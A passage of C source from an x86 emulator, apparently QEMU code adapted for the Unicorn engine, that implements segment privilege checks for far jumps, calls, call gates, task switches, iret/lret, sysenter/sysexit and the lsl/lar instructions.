base=0x%08lx limit=0x%08lx flags=%08x\n", selector, (unsigned long)sc->base, sc->limit, sc->flags); #endif } } /* protected mode jump */ void helper_ljmp_protected(CPUX86State *env, int new_cs, target_ulong new_eip, target_ulong next_eip) { int gate_cs, type; uint32_t e1, e2, cpl, dpl, rpl, limit; if ((new_cs & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } if (load_segment_ra(env, &e1, &e2, new_cs, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_S_MASK) { if (!(e2 & DESC_CS_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (e2 & DESC_C_MASK) { /* conforming code segment */ if (dpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } else { /* non conforming code segment */ rpl = new_cs & 3; if (rpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } if (dpl != cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, GETPC()); } limit = get_seg_limit(e1, e2); if (new_eip > limit && (!(env->hflags & HF_LMA_MASK) || !(e2 & DESC_L_MASK))) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, get_seg_base(e1, e2), limit, e2); env->eip = new_eip; } else { /* jump to call or task gate */ dpl = (e2 >> DESC_DPL_SHIFT) & 3; rpl = new_cs & 3; cpl = env->hflags & HF_CPL_MASK; type = (e2 >> DESC_TYPE_SHIFT) & 0xf; #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { if (type != 12) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } #endif switch (type) { case 1: /* 286 TSS */ case 9: /* 386 TSS */ case 5: /* task gate */ if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } switch_tss_ra(env, new_cs, e1, e2, SWITCH_TSS_JMP, next_eip, GETPC()); break; case 4: /* 286 call gate */ case 12: /* 386 call gate */ if ((dpl < cpl) || (dpl < rpl)) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, GETPC()); } gate_cs = e1 >> 16; new_eip = (e1 & 0xffff); if (type == 12) { new_eip |= (e2 & 0xffff0000); } #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { /* load the upper 8 bytes of the 64-bit call gate */ if (load_segment_ra(env, &e1, &e2, new_cs + 8, GETPC())) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; if (type != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } new_eip |= ((target_ulong)e1) << 32; } #endif if (load_segment_ra(env, &e1, &e2, gate_cs, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; /* must be code segment */ if (((e2 & (DESC_S_MASK | DESC_CS_MASK)) != (DESC_S_MASK | DESC_CS_MASK))) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } if (((e2 & DESC_C_MASK) && (dpl > cpl)) || (!(e2 & DESC_C_MASK) && (dpl != cpl))) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { if (!(e2 & DESC_L_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } if (e2 & DESC_B_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } } #endif if (!(e2 & 
DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, gate_cs & 0xfffc, GETPC()); } limit = get_seg_limit(e1, e2); if (new_eip > limit && (!(env->hflags & HF_LMA_MASK) || !(e2 & DESC_L_MASK))) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } cpu_x86_load_seg_cache(env, R_CS, (gate_cs & 0xfffc) | cpl, get_seg_base(e1, e2), limit, e2); env->eip = new_eip; break; default: raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); break; } } } /* real mode call */ void helper_lcall_real(CPUX86State *env, int new_cs, target_ulong new_eip1, int shift, int next_eip) { int new_eip; uint32_t esp, esp_mask; target_ulong ssp; new_eip = new_eip1; esp = env->regs[R_ESP]; esp_mask = get_sp_mask(env->segs[R_SS].flags); ssp = env->segs[R_SS].base; if (shift) { PUSHL_RA(ssp, esp, esp_mask, env->segs[R_CS].selector, GETPC()); PUSHL_RA(ssp, esp, esp_mask, next_eip, GETPC()); } else { PUSHW_RA(ssp, esp, esp_mask, env->segs[R_CS].selector, GETPC()); PUSHW_RA(ssp, esp, esp_mask, next_eip, GETPC()); } SET_ESP(esp, esp_mask); env->eip = new_eip; env->segs[R_CS].selector = new_cs; env->segs[R_CS].base = (new_cs << 4); } /* protected mode call */ void helper_lcall_protected(CPUX86State *env, int new_cs, target_ulong new_eip, int shift, target_ulong next_eip) { int new_stack, i; uint32_t e1, e2, cpl, dpl, rpl, selector, param_count; uint32_t ss = 0, ss_e1 = 0, ss_e2 = 0, type, ss_dpl, sp_mask; uint32_t val, limit, old_sp_mask; target_ulong ssp, old_ssp, offset, sp; LOG_PCALL("lcall %04x:" TARGET_FMT_lx " s=%d\n", new_cs, new_eip, shift); LOG_PCALL_STATE(env_cpu(env)); if ((new_cs & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } if (load_segment_ra(env, &e1, &e2, new_cs, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } cpl = env->hflags & HF_CPL_MASK; LOG_PCALL("desc=%08x:%08x\n", e1, e2); if (e2 & DESC_S_MASK) { if (!(e2 & DESC_CS_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (e2 & DESC_C_MASK) { /* conforming code segment */ if (dpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } else { /* non conforming code segment */ rpl = new_cs & 3; if (rpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } if (dpl != cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 /* XXX: check 16/32 bit cases in long mode */ if (shift == 2) { target_ulong rsp; /* 64 bit case */ rsp = env->regs[R_ESP]; PUSHQ_RA(rsp, env->segs[R_CS].selector, GETPC()); PUSHQ_RA(rsp, next_eip, GETPC()); /* from this point, not restartable */ env->regs[R_ESP] = rsp; cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); env->eip = new_eip; } else #endif { sp = env->regs[R_ESP]; sp_mask = get_sp_mask(env->segs[R_SS].flags); ssp = env->segs[R_SS].base; if (shift) { PUSHL_RA(ssp, sp, sp_mask, env->segs[R_CS].selector, GETPC()); PUSHL_RA(ssp, sp, sp_mask, next_eip, GETPC()); } else { PUSHW_RA(ssp, sp, sp_mask, env->segs[R_CS].selector, GETPC()); PUSHW_RA(ssp, sp, sp_mask, next_eip, GETPC()); } limit = get_seg_limit(e1, e2); if (new_eip > limit) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } /* from this point, not restartable */ SET_ESP(sp, sp_mask); cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, get_seg_base(e1, e2), limit, 
e2); env->eip = new_eip; } } else { /* check gate type */ type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; dpl = (e2 >> DESC_DPL_SHIFT) & 3; rpl = new_cs & 3; #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { if (type != 12) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } } #endif switch (type) { case 1: /* available 286 TSS */ case 9: /* available 386 TSS */ case 5: /* task gate */ if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } switch_tss_ra(env, new_cs, e1, e2, SWITCH_TSS_CALL, next_eip, GETPC()); return; case 4: /* 286 call gate */ case 12: /* 386 call gate */ break; default: raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); break; } shift = type >> 3; if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } /* check valid bit */ if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, GETPC()); } selector = e1 >> 16; param_count = e2 & 0x1f; offset = (e2 & 0xffff0000) | (e1 & 0x0000ffff); #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { /* load the upper 8 bytes of the 64-bit call gate */ if (load_segment_ra(env, &e1, &e2, new_cs + 8, GETPC())) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; if (type != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, GETPC()); } offset |= ((target_ulong)e1) << 32; } #endif if ((selector & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (dpl > cpl) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 if (env->efer & MSR_EFER_LMA) { if (!(e2 & DESC_L_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (e2 & DESC_B_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } shift++; } #endif if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_C_MASK) && dpl < cpl) { /* to inner privilege */ #ifdef TARGET_X86_64 if (shift == 2) { sp = get_rsp_from_tss(env, dpl); ss = dpl; /* SS = NULL selector with RPL = new CPL */ new_stack = 1; sp_mask = 0; ssp = 0; /* SS base is always zero in IA-32e mode */ LOG_PCALL("new ss:rsp=%04x:%016llx env->regs[R_ESP]=" TARGET_FMT_lx "\n", ss, sp, env->regs[R_ESP]); } else #endif { uint32_t sp32; get_ss_esp_from_tss(env, &ss, &sp32, dpl, GETPC()); LOG_PCALL("new ss:esp=%04x:%08x param_count=%d env->regs[R_ESP]=" TARGET_FMT_lx "\n", ss, sp32, param_count, env->regs[R_ESP]); sp = sp32; if ((ss & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } if ((ss & 3) != dpl) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } if (load_segment_ra(env, &ss_e1, &ss_e2, ss, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } ss_dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; if (ss_dpl != dpl) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } if (!(ss_e2 & DESC_S_MASK) || (ss_e2 & DESC_CS_MASK) || !(ss_e2 & DESC_W_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, GETPC()); } if (!(ss_e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, ss & 0xfffc, 
GETPC()); } sp_mask = get_sp_mask(ss_e2); ssp = get_seg_base(ss_e1, ss_e2); } /* push_size = ((param_count * 2) + 8) << shift; */ old_sp_mask = get_sp_mask(env->segs[R_SS].flags); old_ssp = env->segs[R_SS].base; #ifdef TARGET_X86_64 if (shift == 2) { /* XXX: verify if new stack address is canonical */ PUSHQ_RA(sp, env->segs[R_SS].selector, GETPC()); PUSHQ_RA(sp, env->regs[R_ESP], GETPC()); /* parameters aren't supported for 64-bit call gates */ } else #endif if (shift == 1) { PUSHL_RA(ssp, sp, sp_mask, env->segs[R_SS].selector, GETPC()); PUSHL_RA(ssp, sp, sp_mask, env->regs[R_ESP], GETPC()); for (i = param_count - 1; i >= 0; i--) { val = cpu_ldl_kernel_ra(env, old_ssp + ((env->regs[R_ESP] + i * 4) & old_sp_mask), GETPC()); PUSHL_RA(ssp, sp, sp_mask, val, GETPC()); } } else { PUSHW_RA(ssp, sp, sp_mask, env->segs[R_SS].selector, GETPC()); PUSHW_RA(ssp, sp, sp_mask, env->regs[R_ESP], GETPC()); for (i = param_count - 1; i >= 0; i--) { val = cpu_lduw_kernel_ra(env, old_ssp + ((env->regs[R_ESP] + i * 2) & old_sp_mask), GETPC()); PUSHW_RA(ssp, sp, sp_mask, val, GETPC()); } } new_stack = 1; } else { /* to same privilege */ sp = env->regs[R_ESP]; sp_mask = get_sp_mask(env->segs[R_SS].flags); ssp = env->segs[R_SS].base; /* push_size = (4 << shift); */ new_stack = 0; } #ifdef TARGET_X86_64 if (shift == 2) { PUSHQ_RA(sp, env->segs[R_CS].selector, GETPC()); PUSHQ_RA(sp, next_eip, GETPC()); } else #endif if (shift == 1) { PUSHL_RA(ssp, sp, sp_mask, env->segs[R_CS].selector, GETPC()); PUSHL_RA(ssp, sp, sp_mask, next_eip, GETPC()); } else { PUSHW_RA(ssp, sp, sp_mask, env->segs[R_CS].selector, GETPC()); PUSHW_RA(ssp, sp, sp_mask, next_eip, GETPC()); } /* from this point, not restartable */ if (new_stack) { #ifdef TARGET_X86_64 if (shift == 2) { cpu_x86_load_seg_cache(env, R_SS, ss, 0, 0, 0); } else #endif { ss = (ss & ~3) | dpl; cpu_x86_load_seg_cache(env, R_SS, ss, ssp, get_seg_limit(ss_e1, ss_e2), ss_e2); } } selector = (selector & ~3) | dpl; cpu_x86_load_seg_cache(env, R_CS, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); SET_ESP(sp, sp_mask); env->eip = offset; } } /* real and vm86 mode iret */ void helper_iret_real(CPUX86State *env, int shift) { uint32_t sp, new_cs, new_eip, new_eflags, sp_mask; target_ulong ssp; int eflags_mask; sp_mask = 0xffff; /* XXXX: use SS segment size? */ sp = env->regs[R_ESP]; ssp = env->segs[R_SS].base; if (shift == 1) { /* 32 bits */ POPL_RA(ssp, sp, sp_mask, new_eip, GETPC()); POPL_RA(ssp, sp, sp_mask, new_cs, GETPC()); new_cs &= 0xffff; POPL_RA(ssp, sp, sp_mask, new_eflags, GETPC()); } else { /* 16 bits */ POPW_RA(ssp, sp, sp_mask, new_eip, GETPC()); POPW_RA(ssp, sp, sp_mask, new_cs, GETPC()); POPW_RA(ssp, sp, sp_mask, new_eflags, GETPC()); } env->regs[R_ESP] = (env->regs[R_ESP] & ~sp_mask) | (sp & sp_mask); env->segs[R_CS].selector = new_cs; env->segs[R_CS].base = (new_cs << 4); env->eip = new_eip; if (env->eflags & VM_MASK) { eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | RF_MASK | NT_MASK; } else { eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | RF_MASK | NT_MASK; } if (shift == 0) { eflags_mask &= 0xffff; } cpu_load_eflags(env, new_eflags, eflags_mask); env->hflags2 &= ~HF2_NMI_MASK; } static inline void validate_seg(CPUX86State *env, int seg_reg, int cpl) { int dpl; uint32_t e2; /* XXX: on x86_64, we do not want to nullify FS and GS because they may still contain a valid base. 
I would be interested to know how a real x86_64 CPU behaves */ if ((seg_reg == R_FS || seg_reg == R_GS) && (env->segs[seg_reg].selector & 0xfffc) == 0) { return; } e2 = env->segs[seg_reg].flags; dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { /* data or non conforming code segment */ if (dpl < cpl) { cpu_x86_load_seg_cache(env, seg_reg, 0, 0, 0, 0); } } } /* protected mode iret */ static inline void helper_ret_protected(CPUX86State *env, int shift, int is_iret, int addend, uintptr_t retaddr) { uint32_t new_cs, new_eflags, new_ss; uint32_t new_es, new_ds, new_fs, new_gs; uint32_t e1, e2, ss_e1, ss_e2; int cpl, dpl, rpl, eflags_mask, iopl; target_ulong ssp, sp, new_eip, new_esp, sp_mask; #ifdef TARGET_X86_64 if (shift == 2) { sp_mask = -1; } else #endif { sp_mask = get_sp_mask(env->segs[R_SS].flags); } sp = env->regs[R_ESP]; ssp = env->segs[R_SS].base; new_eflags = 0; /* avoid warning */ #ifdef TARGET_X86_64 if (shift == 2) { POPQ_RA(sp, new_eip, retaddr); POPQ_RA(sp, new_cs, retaddr); new_cs &= 0xffff; if (is_iret) { POPQ_RA(sp, new_eflags, retaddr); } } else #endif { if (shift == 1) { /* 32 bits */ POPL_RA(ssp, sp, sp_mask, new_eip, retaddr); POPL_RA(ssp, sp, sp_mask, new_cs, retaddr); new_cs &= 0xffff; if (is_iret) { POPL_RA(ssp, sp, sp_mask, new_eflags, retaddr); if (new_eflags & VM_MASK) { goto return_to_vm86; } } } else { /* 16 bits */ POPW_RA(ssp, sp, sp_mask, new_eip, retaddr); POPW_RA(ssp, sp, sp_mask, new_cs, retaddr); if (is_iret) { POPW_RA(ssp, sp, sp_mask, new_eflags, retaddr); } } } LOG_PCALL("lret new %04x:" TARGET_FMT_lx " s=%d addend=0x%x\n", new_cs, new_eip, shift, addend); LOG_PCALL_STATE(env_cpu(env)); if ((new_cs & 0xfffc) == 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } if (load_segment_ra(env, &e1, &e2, new_cs, retaddr) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } if (!(e2 & DESC_S_MASK) || !(e2 & DESC_CS_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } cpl = env->hflags & HF_CPL_MASK; rpl = new_cs & 3; if (rpl < cpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (e2 & DESC_C_MASK) { if (dpl > rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } } else { if (dpl != rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr); } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, retaddr); } sp += addend; if (rpl == cpl && (!(env->hflags & HF_CS64_MASK) || ((env->hflags & HF_CS64_MASK) && !is_iret))) { /* return to same privilege level */ cpu_x86_load_seg_cache(env, R_CS, new_cs, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); } else { /* return to different privilege level */ #ifdef TARGET_X86_64 if (shift == 2) { POPQ_RA(sp, new_esp, retaddr); POPQ_RA(sp, new_ss, retaddr); new_ss &= 0xffff; } else #endif { if (shift == 1) { /* 32 bits */ POPL_RA(ssp, sp, sp_mask, new_esp, retaddr); POPL_RA(ssp, sp, sp_mask, new_ss, retaddr); new_ss &= 0xffff; } else { /* 16 bits */ POPW_RA(ssp, sp, sp_mask, new_esp, retaddr); POPW_RA(ssp, sp, sp_mask, new_ss, retaddr); } } LOG_PCALL("new ss:esp=%04x:" TARGET_FMT_lx "\n", new_ss, new_esp); if ((new_ss & 0xfffc) == 0) { #ifdef TARGET_X86_64 /* NULL ss is allowed in long mode if cpl != 3 */ /* XXX: test CS64? 
*/ if ((env->hflags & HF_LMA_MASK) && rpl != 3) { cpu_x86_load_seg_cache(env, R_SS, new_ss, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (rpl << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); ss_e2 = DESC_B_MASK; /* XXX: should not be needed? */ } else #endif { raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr); } } else { if ((new_ss & 3) != rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr); } if (load_segment_ra(env, &ss_e1, &ss_e2, new_ss, retaddr) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr); } if (!(ss_e2 & DESC_S_MASK) || (ss_e2 & DESC_CS_MASK) || !(ss_e2 & DESC_W_MASK)) { raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr); } dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; if (dpl != rpl) { raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr); } if (!(ss_e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, new_ss & 0xfffc, retaddr); } cpu_x86_load_seg_cache(env, R_SS, new_ss, get_seg_base(ss_e1, ss_e2), get_seg_limit(ss_e1, ss_e2), ss_e2); } cpu_x86_load_seg_cache(env, R_CS, new_cs, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); sp = new_esp; #ifdef TARGET_X86_64 if (env->hflags & HF_CS64_MASK) { sp_mask = -1; } else #endif { sp_mask = get_sp_mask(ss_e2); } /* validate data segments */ validate_seg(env, R_ES, rpl); validate_seg(env, R_DS, rpl); validate_seg(env, R_FS, rpl); validate_seg(env, R_GS, rpl); sp += addend; } SET_ESP(sp, sp_mask); env->eip = new_eip; if (is_iret) { /* NOTE: 'cpl' is the _old_ CPL */ eflags_mask = TF_MASK | AC_MASK | ID_MASK | RF_MASK | NT_MASK; if (cpl == 0) { eflags_mask |= IOPL_MASK; } iopl = (env->eflags >> IOPL_SHIFT) & 3; if (cpl <= iopl) { eflags_mask |= IF_MASK; } if (shift == 0) { eflags_mask &= 0xffff; } cpu_load_eflags(env, new_eflags, eflags_mask); } return; return_to_vm86: POPL_RA(ssp, sp, sp_mask, new_esp, retaddr); POPL_RA(ssp, sp, sp_mask, new_ss, retaddr); POPL_RA(ssp, sp, sp_mask, new_es, retaddr); POPL_RA(ssp, sp, sp_mask, new_ds, retaddr); POPL_RA(ssp, sp, sp_mask, new_fs, retaddr); POPL_RA(ssp, sp, sp_mask, new_gs, retaddr); /* modify processor state */ cpu_load_eflags(env, new_eflags, TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | VM_MASK | NT_MASK | VIF_MASK | VIP_MASK); load_seg_vm(env, R_CS, new_cs & 0xffff); load_seg_vm(env, R_SS, new_ss & 0xffff); load_seg_vm(env, R_ES, new_es & 0xffff); load_seg_vm(env, R_DS, new_ds & 0xffff); load_seg_vm(env, R_FS, new_fs & 0xffff); load_seg_vm(env, R_GS, new_gs & 0xffff); env->eip = new_eip & 0xffff; env->regs[R_ESP] = new_esp; } void helper_iret_protected(CPUX86State *env, int shift, int next_eip) { int tss_selector, type; uint32_t e1, e2; /* specific case for TSS */ if (env->eflags & NT_MASK) { #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } #endif tss_selector = cpu_lduw_kernel_ra(env, env->tr.base + 0, GETPC()); if (tss_selector & 4) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, GETPC()); } if (load_segment_ra(env, &e1, &e2, tss_selector, GETPC()) != 0) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, GETPC()); } type = (e2 >> DESC_TYPE_SHIFT) & 0x17; /* NOTE: we check both segment and busy TSS */ if (type != 3) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, GETPC()); } switch_tss_ra(env, tss_selector, e1, e2, SWITCH_TSS_IRET, next_eip, GETPC()); } else { helper_ret_protected(env, shift, 1, 0, GETPC()); } env->hflags2 &= ~HF2_NMI_MASK; } void 
helper_lret_protected(CPUX86State *env, int shift, int addend) { helper_ret_protected(env, shift, 0, addend, GETPC()); } void helper_sysenter(CPUX86State *env, int next_eip_addend) { // Unicorn: call registered SYSENTER hooks struct hook *hook; uc_engine *uc = env->uc; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, env->eip)) continue; if (hook->insn == UC_X86_INS_SYSENTER) { JIT_CALLBACK_GUARD(((uc_cb_insn_syscall_t)hook->callback)(env->uc, hook->user_data)); } // the last callback may already asked to stop emulation if (env->uc->stop_request) break; } env->eip += next_eip_addend; } void helper_sysexit(CPUX86State *env, int dflag) { int cpl; cpl = env->hflags & HF_CPL_MASK; if (env->sysenter_cs == 0 || cpl != 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } #ifdef TARGET_X86_64 if (dflag == 2) { cpu_x86_load_seg_cache(env, R_CS, ((env->sysenter_cs + 32) & 0xfffc) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | DESC_L_MASK); cpu_x86_load_seg_cache(env, R_SS, ((env->sysenter_cs + 40) & 0xfffc) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); } else #endif { cpu_x86_load_seg_cache(env, R_CS, ((env->sysenter_cs + 16) & 0xfffc) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_SS, ((env->sysenter_cs + 24) & 0xfffc) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); } env->regs[R_ESP] = env->regs[R_ECX]; env->eip = env->regs[R_EDX]; } target_ulong helper_lsl(CPUX86State *env, target_ulong selector1) { unsigned int limit; uint32_t e1, e2, eflags, selector; int rpl, dpl, cpl, type; selector = selector1 & 0xffff; eflags = cpu_cc_compute_all(env, CC_OP); if ((selector & 0xfffc) == 0) { goto fail; } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { goto fail; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_S_MASK) { if ((e2 & DESC_CS_MASK) && (e2 & DESC_C_MASK)) { /* conforming */ } else { if (dpl < cpl || dpl < rpl) { goto fail; } } } else { type = (e2 >> DESC_TYPE_SHIFT) & 0xf; switch (type) { case 1: case 2: case 3: case 9: case 11: break; default: goto fail; } if (dpl < cpl || dpl < rpl) { fail: CC_SRC = eflags & ~CC_Z; return 0; } } limit = get_seg_limit(e1, e2); CC_SRC = eflags | CC_Z; return limit; } target_ulong helper_lar(CPUX86State *env, target_ulong selector1) { uint32_t e1, e2, eflags, selector; int rpl, dpl, cpl, type; selector = selector1 & 0xffff; eflags = cpu_cc_compute_all(env, CC_OP); if ((selector & 0xfffc) == 0) { goto fail; } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { goto fail; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_S_MASK) { if ((e2 & DESC_CS_MASK) && (e2 & DESC_C_MASK)) { /* conforming */ } else { if (dpl < cpl || dpl < rpl) { goto fail; } } } else { type = (e2 >> DESC_TYPE_SHIFT) & 0xf; switch (type) { case 1: case 2: case 3: case 4: case 5: case 9: case 11: case 12: break; default: goto fail; } if (dpl < cpl || dpl < rpl) { fail: CC_SRC = eflags & ~CC_Z; return 0; } } CC_SRC = eflags | CC_Z; return e2 & 0x00f0ff00; } void helper_verr(CPUX86State *env, target_ulong 
